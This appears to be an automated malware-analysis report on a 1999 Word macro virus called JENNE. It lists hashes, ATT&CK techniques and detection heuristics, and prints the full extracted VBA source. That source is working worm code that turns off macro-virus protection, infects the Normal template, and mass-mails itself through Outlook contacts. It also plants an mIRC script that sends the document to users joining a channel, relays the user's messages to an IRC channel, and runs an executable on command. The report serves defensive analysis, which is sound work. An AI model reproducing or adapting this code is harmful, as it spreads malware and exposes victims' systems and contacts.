Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c4206a8c1f44f07d…

MALICIOUS

Office (OLE)

Size: 49.0 KB
Created: 1999-11-23 20:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3874361f876d23092c8c1238bd999658
SHA-1: 1e83c55617d2348557e9073b16cd83d08a0e8f22
SHA-256: c4206a8c1f44f07d45ef09b075f798c89b47259e465d457eafc23e3f2e90b06f
Risk score: 356

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macro-virus markers and a VBA AutoOpen macro that exports its own module as 'C:\JENNE.drv' and re-imports it into whichever of the Normal template or the active document is not yet infected. It then saves the document to 'C:\Windows\JENNE\JENNE.doc' and writes a configuration file 'C:\Jenne.ini', an mIRC-style script that it copies to 'C:\mirc\Script.ini', suggesting an attempt to establish persistence and potentially C2 communication over IRC.

Heuristics (8)

  • ClamAV: Win.Trojan.U-74 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.U-74
  • VBA macros detected medium (5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, and sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature.
    Matched line in script
         Set Fire = JENNEF.CreateItem(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set JENNEF = CreateObject("Outlook.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5728 bytes
SHA-256: 88f02ba5a2ea21503c42089a5d3f8c117c139505f8186ce52b9b9821bdef689c
Detection: ClamAV: Win.Trojan.U-74
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JENNE"
Sub AutoOpen()

On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
Kill "C:\Jenne.ini"
Open "C:\Jenne.ini" For Output As #1
Print #1, "[SCRIPT]"
Print #1, ";JENNE SCRIPT - KEEP IT LOAD IF U WANNA BE SAFE"
Print #1, "n0=on 1:start:{"
Print #1, "n1= .remote on"
Print #1, "n2= .ctcps on"
Print #1, "n3= .events on"
Print #1, "n4= }"
Print #1, "n5=on 1:join:#:{"
Print #1, "n6=if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\Jenne\JENNE.doc"
Print #1, "n7= }"
Print #1, "n8=on 1:input:*:.msg #JENNE [( $+ $active $+ ) $1-]"
Print #1, "n9=on 1:text:*:?:.msg #JENNE [( $+ $active $+ )]"
Print #1, "n10=on 1:text:FIREJENNE:*://run $findfile(c:\,**.exe*,1)"
Close #1
Kill "C:\mirc\Script.ini"
SourceFile = "C:\Jenne.ini"
DestinationFile = "C:\mirc\Script.ini"
FileCopy SourceFile, DestinationFile
Kill "C:\Jenne.ini"
If Day(Now()) = 2 And Month(Now()) = 12 Then
MsgBox "Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx", "Jenne-firefox^_^"
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "JENNE") <> "Jenne-firefox" Then
 Set JENNEF = CreateObject("Outlook.Application")
 Set Nam = JENNEF.GetNameSpace("MAPI")
 If JENNEF = "Outlook" Then
  Nam.Logon "profile", "password"
    For y = 1 To Nam.AddressLists.Count
     Set Fox_ = Nam.AddressLists(y)
    x = 1
     Set Fire = JENNEF.CreateItem(0)
     For oo = 1 To Fox_.AddressEntries.Count
       Peep = Fox_.AddressEntries(x)
       Fire.Recipients.Add Peep
       x = x + 1
       If x > 70 Then oo = Fox_.AddressEntries.Count
    Next oo
 Fire.Subject = "Hi! it's" & Application.UserName
 Fire.Body = "Remember!!! On Dec99 the 2nd, she will be 35! Happy birthday Jenne-firefox^_^"
 Fire.Attachments.Add ThisDocument.FullName
 Fire.Send
 Peep = ""
 Next y
 Nam.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "JENNE") = "Jenne-firefox"
End If
End Sub


Sub ToolsMacro()
'V_Name = [Jenne-firefox^_^]
'Nhgube = [Qry_Nezt0_4_ArgFabbcre/UryySverm]
'Date   = [23nov99]
'Type   = [W97MacroVirus/Mirc_OutLook_Worm]
'Disclaim = [Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx]
End Sub

Sub ViewVBCode()
MsgBox "No code tO see! ;)"
End Sub

Sub ToolsCustomize()
'
End Sub

Sub FileTemplates()
'
End Sub

Sub Jenne_FireFox()
'Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx
End Sub

Sub FileSave()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
End Sub

Sub AutoClose()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
End Sub